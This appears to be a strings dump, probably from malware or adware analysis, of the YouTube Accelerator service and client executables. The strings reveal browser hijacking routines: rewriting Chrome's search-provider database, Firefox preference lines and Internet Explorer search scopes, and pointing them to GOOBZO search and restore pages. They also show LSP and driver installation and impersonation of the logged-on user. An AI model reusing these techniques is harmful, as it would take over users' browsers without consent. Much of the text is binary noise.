    2.1.0.7
    2.0.0.0
    ReadOptionalStringNode
    ReadStringNode
    ReadStringNode
    ReadBooleanNode
    ReadBooleanNode
    ReadBooleanNode
    Could not find URL Set in configuration. Probably older configuration.
    WatchmanKey::System::LoadSystemConfig
    WatchmanKey::System::SaveSystemConfig
    [Config::User::Chrome::Settings::Copy]
    [Config::User::Firefox::Settings::Copy]
    Config::User::Parser::ParseChromeSettings
    Config::User::Parser::ParseFirefoxSettings
    [Config::User::Parser::ParseChromeSettings]
    [Config::User::Parser::ParseFirefoxSettings]
    [Config::User::Builder::BuildChromeSettings]
    [Config::User::Builder::BuildFirefoxSettings]
    WatchmanKey::User::LoadConfiguration
    WatchmanKey::User::SaveConfiguration
    CChromeExtension::GetFileListInExtenstion
    GCHROME.EXE
    __MSG_
    manifest.json
    messages.json
    WebData
    [Chrome::BrowserInfo::Query]
    Google\Chrome
    \Application\chrome.exe
    \Google\Chrome\Application\chrome.exe
    \resources.pak
    \Google\Chrome\Application\
    \Web Data
    [Chrome::BrowserSettings::OpenConfigFiles]
    Chrome::InstallInfo::Get
    SQLite::WebDataDB::Create
    [Chrome::BrowserSettings::SetHomePagePreferences]
    Argument.HomePageUrl:
    Argument.HomePageIsNewTabPage:
    [Chrome::BrowserSettings::SetDefaultProviderPreferences]
    Argument.DefaultProviderId:
    Argument.DefaultProviderKeyWord:
    Argument.DefaultProviderName:
    Argument.DefaultProviderEncoding:
    Argument.DefaultProviderSearchUrl:
    Argument.DefaultProviderIconUrl:
    Argument.DefaultProviderSuggestUrl:
    [Chrome::BrowserSettings::SetRestoreOnStartupPreferences]
    Argument.RestoreOnStartup:
    Argument.UrlsToRestoreOnStartup:
    [Chrome::BrowserSettings::GetSearchProviderId]
    Argument.KeywordToSearch:
    SQLite::WebDataDB::GetFirstProviderId
    SQLite::WebDataDB::GetProviderById
    Result.ProviderId:
    [Chrome::BrowserSettings::EnsureSearchProvider]
    SQLite::WebDataDB::Values::Create
    [Chrome::BrowserSettings::DeleteSearchProvider]
    Key deleted:
    [Chrome::BrowserSettings::MakeSnapshot]
    [Chrome::BrowserSettings::RestoreState]
    Chrome::BrowserSettings::OpenConfigFiles
    Chrome::BrowserSettings::DeleteSearchProvider
    SQLite::WebDataDB::SetDefaultProvider
    [Chrome::BrowserSettings::PropagateState]
    Chrome::BrowserSettings::EnsureSearchProvider
    [SQLite::Implementation::AddProvider]
    [SQLite::Implementation::GetProviderById]
    [SQLite::Implementation::GetProviderByKeyword]
    [SQLite::Implementation::GetFirstProviderId]
    [SQLite::Implementation::GetProviderId]
    Kchrome-extension://
    Checking
    [Firefox::BrowserSettings::MakeSnapshot]
    [Firefox::BrowserSettings::RestoreState]
    [Firefox::BrowserSettings::PropagateState]
    Software\Microsoft\Internet Explorer\URLSearchHooks
    [Explorer::BrowserSettings::SetMainKeyValues]
    [Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]
    [Explorer::BrowserSettings::SetSearchScopeKeyValues]
    [Explorer::BrowserSettings::SetAboutURLsKeyValues]
    Argument.SearchScopeToSearch:
    Result.SearchScope:
    [Explorer::BrowserSettings::DeleteKey]
    Argument.Parent:
    Argument.Subkey:
    VirtualSpeedbitSearchScopeKey::EnsureKeyW
    SuggestionsURL

    YouTubeAcceleratorService.exe_2516:

    .text
    `.rdata
    @.data
    .text1
    .adata
    .data1
    .pdata
    .rsrc
    uh9.tZ
    otuh9.tZ
    tZ9.tB
    tV9.tB
    l$$9.tZ
    t9.tZ
    uB9.tF
    Windows CE
    Windows 7
    Windows Vista
    Windows 2003 Server
    Windows XP
    Windows 2000
    Windows NT
    Windows Me
    Windows 98
    Windows 95
    [CAcceleratorService::ExecuteServerAsWD] Exit
    [CAcceleratorService::ExecuteServerAsWD] Impersonate Wakeup
    \\.\pipe\GOOBZO_VAPIPESERVERENG
    [CAcceleratorService::ExecuteServerAsWD] Enter
    [CAcceleratorService::CreateEngineThread] Create thread result %d
    [CAcceleratorService::CreateEngineThread] ___Error Creating the Engine Keep Alive event. error: %d
    [CAcceleratorService::StopServiceExitMode] Name: %s
    [CAcceleratorService::ProcessTimeoutEvent] ___Error wait for thread termination result %d
    [CAcceleratorService::ProcessTimeoutEvent] ___Error StopThread result %d
    [CAcceleratorService::ExecuteServer] Leave
    [CAcceleratorService::ExecuteServer] Calling to ExecuteServerAsWD
    [CAcceleratorService::ExecuteServer] ___Error creating the service named event. LE: %d
    [CAcceleratorService::ExecuteServer] Enter
    %d.%d.%d.%d
    Name: %s
    Path: %s
    Version: %s
    %s_%d.log
    [CAcceleratorService::InstallDriver] Driver name: %s, Driver path: %s
    [CAcceleratorService::UninstallDriver] Driver name: %s
    [CAcceleratorService::InstallLsp] Module not found - LE: %d
    [CAcceleratorService::InstallLsp] Function Install not found - LE: %d
    [CAcceleratorService::InstallLsp] Module path: %s
    [CAcceleratorService::UninstallLsp] Module not found - LE: %d
    [CAcceleratorService::UninstallLsp] Function Remove not found - LE: %d
    [CAcceleratorService::UninstallLsp] Module path: %s
    [CAcceleratorService::RunCommand] Command: %d
    [CLSPKeepAlive::GetLastLSPTestStatus] return %d
    [CLSPKeepAlive::CheckOurLSPStatus]
    [CLSPKeepAlive::Work] CheckOurLSPStatus - our LSP is installed!
    [CLSPKeepAlive::Work] ___Error CheckOurLSPStatus - *** SBLSP NOT Installed ***
    [CLSPKeepAlive::Work] ___Error creating the service named event. LE: %d
    %sLow\%s\
    %C:\Users\Public\Documents\%s\%s\
    %s\%s\%s\
    %s\Application Data\%s\%s\
    [CDriverManager::CreateDriver] CreateService failed: %d
    Tcpip
    [CDriverManager::CreateDriver] Name: %s, Path: %s
    [CDriverManager::Install] OpenSCManager failed: %d
    [CDriverManager::Install] Name: %s, Path: %s
    [CDriverManager::DeleteDriver] DeleteService failed: %d
    [CDriverManager::DeleteDriver] OpenService failed: %d
    [CDriverManager::DeleteDriver] Name: %s
    [CDriverManager::UnInstall] OpenSCManager failed: %d
    [CDriverManager::UnInstall] Name: %s
    [CDriverManager::StartDriver] OpenService failed: %d
    [CDriverManager::StartDriver] Name: %s
    [CDriverManager::Load] OpenSCManager failed: %d
    [CDriverManager::Load] Name: %s
    [CDriverManager::StopDriver] OpenService failed: %d
    [CDriverManager::StopDriver] Name: %s
    [CDriverManager::UnLoad] OpenSCManager failed: %d
    [CDriverManager::UnLoad] Name: %s
    [CEventsThread::SetTimeoutResolution] From: %d -> To: %d
    [CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms
    [CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms
    [CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d
    [CEventsThread::WaitForMultipleEvents] TID=%X
    [CEventsThread::CreateNamedEvent] OpenEvent. LE: %d
    [CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d
    [CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...
    [CEventsThread::Start - Leave] TID=%X
    [CEventsThread::Start] ___Error - Failed to create thread: %X
    [CEventsThread::Stop - Leave] TID=%X
    [CEventsThread::Stop - Enter] TID=%X
    [CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d
    [CEventsThread::AlertEvent] ___Error SetEvent failed: %d
    [CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d
    [CEventsThread::AlertEvent] ___Error Not found Event: %d
    [CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d
    [CEventsThread::SetGlobalEvent] ___Error Not found Event: %d
    [CEventsThread::SetGlobalEvent] Event: %d
    [CEventsThread::ResetEvent] ___Error ResetEvent failed: %d
    [CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d
    [CEventsThread::ResetEvent] ___Error Not found Event: %d
    [CEventsThread::ResetEvent] Event: %d
    [CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d
    [CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d
    [CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d
    [CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d
    [CEventsThread::RemoveEvent] ___Error Not found Event: %d
    [CEventsThread::RemoveEvent] Event: %d
    [CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d
    [CEventsThread::Cleanup] Closing Handle: %d
    [CEventsThread::WaitEvent] TID=%X
    [CEventsThread::Work] TID=%X - Exit !!!
    [CEventsThread::Work] WAIT_ABANDONED - %d
    [CEventsThread::Work] TID=%X
    [CEventsThread::AddEvent] ___Warning event handle already exists %d
    [CEventsThread::AddEvent] ___Error invalid event handle %d
    [CImpersonate::Impersonate] ImpersonateLoggedOnUser - Error: %d
    [CImpersonate::Impersonate] Impersonated: %d
    [CImpersonate::Revert] RevertToSelf - Error: %d
    [CImpersonate::Revert] Impersonated: %d
    [CImpersonate::Cleanup] Impersonated: %d
    [CImpersonate::GetUserSID] LookupAccountNameW failed. GetLastError returned: %d
    [CImpersonate::GetUserSID] The SID for %s is invalid.
    [CImpersonate::GetUserSID] Not Enough Memory: %d
    [CImpersonate::SetPrivilege] AdjustTokenPrivileges - Error: %d
    [CImpersonate::SetPrivilege] LookupPrivilegeValue - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] - The function does not support Windows Vista and Windows 98
    [CImpersonate::OpenCurrentUserDesktop] OpenDesktop - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] OpenInputDesktop - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] SetProcessWindowStation - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] OpenWindowStation - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] GetProcessWindowStation - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] - The function does not support MAC
    [CImpersonate::CreateProcessAsCurrentUser] CreateProcessAsUser - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] CreateEnvironmentBlock - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] AddAceToDesktop - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] AddAceToWindowStation - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] GetLogonSID - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] DuplicateTokenEx - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] OpenDesktop - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] SetProcessWindowStation - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] OpenWindowStation - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] GetProcessWindowStation - Error: %d
    [CImpersonate::AddAceToWindowStation] SetUserObjectSecurity - Error: %d
    [CImpersonate::AddAceToWindowStation] SetSecurityDescriptorDacl - Error: %d
    [CImpersonate::AddAceToWindowStation] CopySid - Error: %d
    [CImpersonate::AddAceToWindowStation] AddAce - Error: %d
    [CImpersonate::AddAceToWindowStation] GetAce - Error: %d
    [CImpersonate::AddAceToWindowStation] GetAclInformation - Error: %d
    [CImpersonate::AddAceToWindowStation] GetUserObjectSecurity - Error: %d
    [CImpersonate::AddAceToDesktop] SetUserObjectSecurity - Error: %d
    [CImpersonate::AddAceToDesktop] SetSecurityDescriptorDacl - Error: %d
    [CImpersonate::AddAceToDesktop] AddAccessAllowedAce - Error: %d
    [CImpersonate::AddAceToDesktop] AddAce - Error: %d
    [CImpersonate::AddAceToDesktop] GetAce - Error: %d
    [CImpersonate::AddAceToDesktop] GetSecurityDescriptorDacl - Error: %d
    [CImpersonate::AddAceToDesktop] GetUserObjectSecurity - Error: %d
    [CImpersonate::OpenCurrentUserKey] LoadUserProfile - SUCCESS
    [CImpersonate::OpenCurrentUserKey] LoadUserProfile failed - Error: %d
    [CImpersonate::GetLogonUserName] GetLogonUserName - Error: %d
    [CImpersonate::OpenCurrentUserKey] RegOpenCurrentUser - Error: %d
    [CImpersonate::OpenCurrentUserKey] RegOpenCurrentUser - SUCCESS
    [CImpersonate::OpenCurrentUserKey] Impersonated: %d
    [CImpersonate::FindLoggedOnUser] Process32First - Error: %d
    [CImpersonate::FindLoggedOnUser] OpenProcess - Error: %d
    [CImpersonate::FindLoggedOnUser] OpenProcessToken - Error: %d
    [CImpersonate::FindLoggedOnUser] CreateToolhelp32Snapshot failed - Error: %d
    SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    explorer.exe
    [CImpersonate::FindLoggedOnUser] Impersonated: %d
    [CImpersonate::GetLogonUserName] Name: %s
    [CImpersonate::GetLogonUserName] GetUserName - Error: %d
    [CImpersonateThread::NotifyImpersonateLogon] Time: %d
    [CImpersonateThread::NotifyImpersonateLogoff] Time: %d
    [CImpersonateThread::ProcessEvent] CreateProcess - CmdLine: %s, AppName: %s, ShowCmd: %d
    [CImpersonateThread::CreateProcess] CmdLine: %s, AppName: %s, ShowCmd: %d
    [CImpersonateThread::Start ] ___Error SetConsoleCtrlHandler(TRUE), LE: %d
    [CImpersonateThread::Start ] ___Error SetConsoleCtrlHandler(FALSE) failed: %d
    engine.dll
    DestroyPipeEventThreadManager
    CreatePipeEventThreadManager
    ipc.dll
    xmldb.dll
    config.xml
    <d/d/%d d:d:d::d 0x%X>
    [SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
    [SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
    [SbTracer::RecursiveCreateDirectory] Directory: %s
    [SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
    [SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
    [SbTracer::ReadConfiguration] Trace Max Size: %d
    [SbTracer::ReadConfiguration] Trace Time Stamp: %d
    [SbTracer::ReadConfiguration] Trace Time Limit: %d
    [SbTracer::ReadConfiguration] Trace Backup: %d
    [SbTracer::ReadConfiguration] Trace Destination: %d
    [SbTracer::ReadConfiguration] Trace Level: %d
    [SbTracer::FormatFilePath] Log Path: %s
    [SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
    [SbTracer::FormatFilePath] ___Warning - No Log folder: %s
    [SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
    \StringFileInfo\x\%s
    [SbTracer::BackupTraceFile] %s
    [SbTracer::OpenTraceFile] Done %s
    [SbTracer::OpenTraceFile] ___Error: %d, File: %s
    [SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] SetSecurityDescriptorDacl failed. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] InitializeSecurityDescriptor failed. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the trusted owner. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the Everyone group. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the queue owner. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] InitializeAcl failed. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] GetLogonSID failed. Error code: 0x%X
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AllocateAndInitializeSid failed. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] GetTokenInformation failed. GetLastError returned: %d
    [CServiceController::ChangeStartType] ___Error ChangeServiceConfig failed: %d
    [CServiceController::ChangeStartType] ___Error OpenService: %s, failed: %d
    [CServiceController::ChangeStartType] ___Error OpenSCManager failed: %d
    [CServiceController::ChangeStartType] Name: %s
    [CServiceController::ExecuteServer] Exit
    [CServiceController::ExecuteServer] Enter
    [CServiceController::ServiceMain] ___Error SetServiceStatus Failed: %d
    [CServiceController::ServiceMain] ___Error RegisterServiceCtrlHandler Failed: %d
    [CServiceController::UpdateServiceDespatchTable] ___Error Exception StartServiceCtrlDispatcher Failed: %d
    [CServiceController::UpdateServiceDespatchTable] ___Error StartServiceCtrlDispatcher Failed: %d
    [CServiceController::UpdateServiceDespatchTable] Enter, %s
    [CServiceController::Remove] ___Error OpenService Failed: %d
    [CServiceController::Remove] ___Error OpenSCManager Failed: %d
    [CServiceController::GetStatus] ___Error QueryServiceStatus Failed: %d
    [CServiceController::GetStatus] ___Error OpenService Failed: %d
    [CServiceController::GetStatus] ___Error OpenSCManager Failed: %d
    [CServiceController::Start] The service %s was started
    [CServiceController::Start] ___Error StartService Failed: %d
    [CServiceController::Start] ___Error OpenService Failed: %d
    [CServiceController::Start] ___Error OpenSCManager Failed: %d
    [CServiceController::Start] Going to start the service %s
    [CServiceController::Stop] The service %s was stopped
    YoutubeAcceleratorService.exe
    [CServiceController::Stop] ___Error ControlService Failed: %d
    [CServiceController::Stop] ___Error OpenService Failed: %d
    [CServiceController::Stop] Going to stop the service %s
    [CServiceController::Stop] ___Error SetServiceStatus Failed: %d
    [CServiceController::Install] ___Error OpenService Failed: %d
    [CServiceController::Install] ___Error QueryServiceStatus Failed: %d
    [CServiceController::Install] ___Error CreateService Failed: %d
    [CServiceController::Install] ___Error OpenSCManager Failed: %d
    %s -%s -%s
    %s\%s
    [CServiceController::Install] ___Error GetModuleFileName Failed: %d
    [CServiceController::GetArgsFromCmd] Exit
    [CServiceController::GetArgsFromCmd] m_bSCMCmd = TRUE
    [CServiceController::GetArgsFromCmd] Enter
    [CServiceController::RunCommand] Args: %s
    Please contact the application's support team for more information.
    - Attempt to initialize the CRT more than once.
    - CRT not initialized
    - floating point support not loaded
    operator
    GetProcessWindowStation
    USER32.DLL
    d:\build_GOOBZO\Client\VA_3_2\Bin\Release\YouTubeAcceleratorService.pdb
    KERNEL32.dll
    USER32.dll
    ADVAPI32.dll
    SHELL32.dll
    VERSION.dll
    USERENV.dll
    PSAPI.DLL
    .?AVIPipeEventsThread@@
    .?AVCPipeEventThread@@
    .?AV?$IMultiBaseInterface@VIPipeEventThreadManagerFactory@@@@
    .?AVIPipeEventThreadManagerFactory@@
    .?AV?$CMultiBaseInterface@VCPipeEventThreadManagerFactory@@VIPipeEventThreadManagerFactory@@@@
    .?AVCPipeEventThreadManagerFactory@@
    C:\PROGRA~1\YOUTUB~1\YouTubeAcceleratorService.exe
    aSSSh
    FTPjK
    FtPj;
    C.PjRV
    ]@ ]( ]8
    tGHt.Ht&
    FTPQ
    .?AVunsupported_thread_option@boost@@
    zcÁ
    SetProcessShutdownParameters
    kernel32.dll
    COMCTL32.DLL
    boost::too_few_args: format-string referred to more arguments than were passed
    boost::too_many_args: format-string referred to less arguments than were passed
    Required USB Key not found
    Failed to execute target process
    Cannot find import; DLL may be missing, corrupt, or wrong version
    File "%s", function "%s"
    File "%s", ordinal %d
    File "%s", error %d
    (Error code %d)
    %X:DAF
    (Location XEB, error code %d)
    _PAD%d
    RNX
    %X::DAX
    KERNEL32.DLL
    .DbgLog
    GetWindowsDirectoryW
    CreateDialogIndirectParamW
    Kernel32.dll
    User32.dll
    ComDlg32.dll
    1.2.3
    EXCEPTION_FLT_INVALID_OPERATION
    EXCEPTION_FLT_DENORMAL_OPERAND
    boost::unsupported_thread_option
    mscoree.dll
    Visual C   CRT: Not enough memory to complete call to strerror.
    .mixcrt
    ADVAPI32.DLL
    portuguese-brazilian
    Broken pipe
    Inappropriate I/O control operation
    Operation not permitted
    deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
    inflate 1.2.3 Copyright 1995-2005 Mark Adler
    C:\PROGRA~1\YOUTUB~1\YouTubeAcceleratorService-2.DbgLog
    GetWindowsDirectoryA
    EnumThreadWindows
    EnumWindows
    CreateDialogIndirectParamA
    GetAsyncKeyState
    GDI32.dll
    comdlg32.dll
    GetProcessHeap
    GetCPInfo
    GetConsoleOutputCP
    ýHI
    8-D5tR7}Q
    Sl8c%f
    .xcf@Qj
    3v%d'
    WZ%dG
    G.TKO 
    S.Anj#
    ]e.FX
    .pptqQC
    MSGi
    E%sT_[2'i
    <,.Aw~Dg_
    O<.VO
    u.Kw./
    Xþu
    }8>S%f
    l& (
    ekn.Wi
    U.JO2
    I%d 6|
    o7%D$
    47.Khz
    z%x{]
    MLA%C
    .aZi'_6j
    %X/5p
    .Ÿ:f;
    -o.Po/
    =AhC
    %F[Ys.=jK
    f%SEUQ
    3v.lY_
    ?`^T.NJ
    wvÙ
    z_.Of
    !A.Ghm
    h%fPT
    Q<.tBH-y
    !.sGI
    2e5.BSP
    g1%ss
    OUTUB~1\YouTubeAcceleratorService.exe
    3.3.9.4

    YouTubeAccelerator.exe_3416:

    .text
    `.rdata
    @.data
    .text1
    .adata
    .data1
    .pdata
    .rsrc
    uh9.tZ
    otuh9.tZ
    tZ9.tB
    tV9.tB
    l$$9.tZ
    ub9.tM
    @ SSh
    SSSSh
    D$<9.tZ
    \9.tB
    D$`9.tZ
    FTPj
    t#WSSh
    D$(PSSh
    s%j.Zf
    tGHt.Ht&
    %a,%d-%b-%Y %H:%M:%S
    DestroyPipeEventThreadManager
    CreatePipeEventThreadManager
    spCmd
    3.3.9.4
    user32.dll
    CWebBrowser2
    CNotSupportedException
    hhctrl.ocx
    CCmdTarget
    KERNEL32.DLL
    Please contact the application's support team for more information.
    - Attempt to initialize the CRT more than once.
    - CRT not initialized
    - floating point support not loaded
    GetProcessWindowStation
    USER32.DLL
    operator
    OLEACC.dll
    d:\build_GOOBZO\Client\VA_3_2\Bin\Release_Unicode\YouTubeAcceleratorU.pdb
    VERSION.dll
    KERNEL32.dll
    USER32.dll
    GDI32.dll
    COMDLG32.dll
    WINSPOOL.DRV
    ADVAPI32.dll
    SHELL32.dll
    COMCTL32.dll
    SHLWAPI.dll
    oledlg.dll
    ole32.dll
    OLEAUT32.dll
    WININET.dll
    WS2_32.dll
    USERENV.dll
    PSAPI.DLL
    .?AVCCmdTarget@@
    .PAVCException@@
    .?AVCWebWindow@@
    .?AVCHttp@@
    .?AVCHttpAsync@@
    .?AVCExecuteUpdate@@
    .?AVCExitWindows@@
    .?AVIHttpEngineConfiguration@@
    .?AV?$CBaseInterface@VHttpEngineConfiguration@@VIHttpEngineConfiguration@@@@
    .?AVHttpEngineConfiguration@@
    .?AVIPipeEventsThread@@
    .?AVCSLogReportEventThread@@
    .?AVCPipeEventThread@@
    .?AV?$IMultiBaseInterface@VIPipeEventThreadManagerFactory@@@@
    .?AVIPipeEventThreadManagerFactory@@
    .?AV?$CMultiBaseInterface@VCPipeEventThreadManagerFactory@@VIPipeEventThreadManagerFactory@@@@
    .?AVCPipeEventThreadManagerFactory@@
    <>"#{}|\^~[]`' ?&
    .?AVCSABaseWebWindow@@
    .?AVCSANotifierWebWindow@@
    .?AVCSAWebWindow@@
    .PAVCMemoryException@@
    .?AVCWebBrowser2@@
    .?AVCWebForm@@
    .?AVCWebElement@@
    .?AVCWebInput@@
    .?AVCWebAnchor@@
    .?AVCWebDiv@@
    .?AVCWebCheckBox@@
    .PAVCSimpleException@@
    .PAVCObject@@
    .PAVCNotSupportedException@@
    .PAVCInvalidArgException@@
    .?AVCNotSupportedException@@
    .PAVCOleException@@
    .PAVCResourceException@@
    .PAVCUserException@@
    .?AVCTestCmdUI@@
    .?AVCCmdUI@@
    .PAVCOleDispatchException@@
    .PAVCArchiveException@@
    .?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
    .?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
    .PAVCFileException@@
    zcÁ
    aSSSh
    FTPjK
    FtPj;
    C.PjRV
    ]@ ]( ]8
    FTPQ
    .?AVunsupported_thread_option@boost@@
    SetProcessShutdownParameters
    kernel32.dll
    COMCTL32.DLL
    boost::too_few_args: format-string referred to more arguments than were passed
    boost::too_many_args: format-string referred to less arguments than were passed
    Required USB Key not found
    Failed to execute target process
    Cannot find import; DLL may be missing, corrupt, or wrong version
    File "%s", function "%s"
    File "%s", ordinal %d
    File "%s", error %d
    (Error code %d)
    %X:DAF
    (Location XEB, error code %d)
    _PAD%d
    RNX
    %X::DAX
    .DbgLog
    GetWindowsDirectoryW
    CreateDialogIndirectParamW
    Kernel32.dll
    User32.dll
    ComDlg32.dll
    1.2.3
    EXCEPTION_FLT_INVALID_OPERATION
    EXCEPTION_FLT_DENORMAL_OPERAND
    boost::unsupported_thread_option
    mscoree.dll
    Visual C   CRT: Not enough memory to complete call to strerror.
    .mixcrt
    ADVAPI32.DLL
    portuguese-brazilian
    Broken pipe
    Inappropriate I/O control operation
    Operation not permitted
    deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
    inflate 1.2.3 Copyright 1995-2005 Mark Adler
    =.ftt
    %Program Files%\YouTube Accelerator\YouTubeAccelerator-2.DbgLog
    %Program Files%\YouTube Accelerator\YouTubeAccelerator.exe
    GetWindowsDirectoryA
    EnumThreadWindows
    EnumWindows
    CreateDialogIndirectParamA
    GetAsyncKeyState
    comdlg32.dll
    GetProcessHeap
    GetCPInfo
    GetConsoleOutputCP
    ýHI
    8-D5tR7}Q
    Sl8c%f
    .xcf@Qj
    3v%d'
    WZ%dG
    G.TKO 
    S.Anj#
    ]e.FX
    .pptqQC
    MSGi
    E%sT_[2'i
    <,.Aw~Dg_
    O<.VO
    u.Kw./
    Xþu
    }8>S%f
    l& (
    ekn.Wi
    U.JO2
    I%d 6|
    o7%D$
    47.Khz
    z%x{]
    MLA%C
    .aZi'_6j
    %X/5p
    .Ÿ:f;
    -o.Po/
    =AhC
    ^.Rkx
    lq.pz
    F.DLu}_/{z
    _.nfW
    }MM.FZsf
    i%uzf
    AN)V_.PW
    ,8vZOs.Qo
    mV.FkY1U
    Up/.AJy{
    {T3w%Ck
    %XS@jF
    #.GP*|
    ZA.LB
    [email protected]
    .fOtT
    r.AG"
    z<%F@P
    %U):Iewg
    8H.CC
    K''y%u
    %3snn
    Fr%D&
    u*%s0#
    3P'%c?
    j.%DhP
    W.xIL,
    ÎPO
    .gpZo
    $[Ö
    .hEL%
    .MP?YW
    q-Rn8}1
    j.fM&
    f.qXM
    .oo`O
    /P.opI6
    x.kE`
    R Dpj%x`S
    v7%c$
    b?0-%d
    %OJ%fl
    ^__:;;,,,~
    9:;556011---
    %s (%s:%d)
    %Program Files%\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
    Ihttp://@BRAND_ID@.@[email protected]/support/video-sites
    http://@BRAND_ID@.@[email protected]/buy/hd/
    http://wiki.@[email protected]/doku.php?id=va:start
    %s?OEM=%s
    http://www.@[email protected]
    http://@BRAND_ID@.@[email protected]/legal/license
    blank.html
    http://www.@[email protected]/legal/privacy
    [CAcceleratorEventsData::OnDeserialize] ___Error get URL
    @CActivationBrowser::OnBeforeNavigate : url = %s
    CActivationBrowser::OnNavigateComplete : url = %s
    CActivationBrowser::OnNavigateError : url = %s
    Res.dll
    CActivationBrowser::SetMetaData GOT 'OPEN_URL'
    OPEN_URL
    CActivationBrowser::SetMetaData GOT 'ACTIVATION_BACK_URL'
    ACTIVATION_BACK_URL
    activation_offline.mht
    %X%X%X
    http://client.@[email protected]/clientva/Activation.aspx
    CActivationBrowser::OnDocumentComplete : url = %s
    ipc.dll
    \\.\pipe\GOOBZO_VAPIPESERVERENG
    LastNum%d
    LastID%d
    \\.\pipe\GOOBZO_VAPIPESERVERUI
    CBrowserSettings::RegisterDLL - LoadLibrary() Failed: %s
    CBrowserSettings::RegisterDLL %s
    %s = %s; expires = %s
    %a,%d-%b-%Y %H:%M:%S GMT
    2prefs.js
    profiles.ini
    profile%d
    Mozilla\Firefox\
    cookies.txt
    Software\Microsoft\Internet Explorer\AboutURLs
    user_pref("keyword.URL", "%s");
    Use Custom Search URL
    DefaultSearchURL
    SBSearch.dll
    SearchURL
    Web Search
    user_pref("browser.startup.homepage","%s");
    restore.GOOBZO.com
    http://search.GOOBZO.com
    search.GOOBZO.com
    %d-%b-%Y
    http://restore.GOOBZO.com
    user_pref("browser.startup.homepage",
    AHTTP/1.0
    Software\Microsoft\Windows\CurrentVersion\Internet Settings
    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    HTTP/1.1
    Content-Type: multipart/form-data; boundary=%s
    Content-Disposition: form-data; name="%s"
    XXX
    [CCommandsQueue::SetAsync (%p)] ___Error CreateEvent(), Error: %d
    [CCommandsQueue::CCommandsQueue - (%p)] CreateEvent() - Failed, Error: %d
    test.youtubeaccelerator.com
    http://test.youtubeaccelerator.com/video_accelerator/wizardtest/SMALLTEST.HTM?random=%d&mode=%s
    Windows CE
    Windows 7
    Windows Vista
    Windows 2003 Server
    Windows XP
    Windows 2000
    Windows NT
    Windows Me
    Windows 98
    Windows 95
    [CCommTest::SetEngineMode] %d
    vaproxy.pac
    [CCommTest::StartServiceTest] ___Error Default EngineMode = %d !!!
    [CCommTest::StartGuiTest] ___Error to create VACommTest process. LE: %d
    testlsp.exe
    [CCommTest::ProcessNextState] ___Error State = %d !!!
    [CCommTestDlg::KillAllTimers] m_ConnectivityCheckTimer Timer: %d
    [CCommTestDlg::ResetConnectionTimer] SetTimer: %d
    [CCommTestDlg::ResetConnectivityCheckTimer] SetTimer: %d
    CCommTestDlg::OnTimer() - m_ConnectionTestFailedTimer: %d
    SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
    showitunesMsg
    DontShowAccelerationNotSupported
    lastiTunesMsgTime
    ManualProxyPort
    [CConfig::IsLastTestingSucceeded] REGISTRY - Status = %d
    [CConfig::IsLastTestingSucceeded] XML - Status = %d
    [CConfig::SetLastTestingSucceeded] ___Error LastTestingSucceeded = %d (XML)
    [CConfig::SetLastTestingSucceeded] LastTestingSucceeded = %d (XML)
